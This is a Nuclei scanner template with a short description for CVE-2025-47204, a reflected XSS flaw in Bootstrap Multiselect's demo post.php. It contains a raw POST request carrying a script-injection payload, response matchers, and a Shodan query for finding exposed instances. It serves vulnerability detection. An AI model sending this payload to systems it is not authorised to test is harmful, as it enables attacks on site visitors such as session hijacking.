A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
PoC代码[已公开]
id: CVE-2025-47204
info:
name: Bootstrap Multiselect <= 1.1.2 - Cross-Site Scripting
author: r3naissance
severity: medium
description: |
A PHP script in the source code release echoes arbitrary POST data. If a developer adopts this structure wholesale in a live application, it could create a Reflective Cross-Site Scripting (XSS) vulnerability exploitable through Cross-Site Request Forgery (CSRF).
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
remediation: |
Only use the necessary components (css/js) in production applications
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-47204
classification:
epss-score: 0.01638
epss-percentile: 0.81284
metadata:
verified: true
max-request: 1
shodan-query: html:"bootstrap-multiselect"
tags: cve,cve2025,xss,bootstrap-multiselect,vkev
http:
- raw:
- |
POST /bootstrap-multiselect/post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
canary="><script>alert(document.domain)</script>
matchers:
- type: dsl
dsl:
- 'contains(content_type, "text/html")'
- 'contains_all(body, "<script>alert(document.domain)</script>", "bootstrap-multiselect-master")'
condition: and
# digest: 4a0a0047304502207ec4a25b732d23e665ecd62a47f43c9fe2cc2fce3d26ed1f852228311270cc3e022100db033d6ae57107eae61995ddf24b1e2e0b408250cdec1c60983f20b3eb8f1725:922c64590222798bb761d5b6d8e72950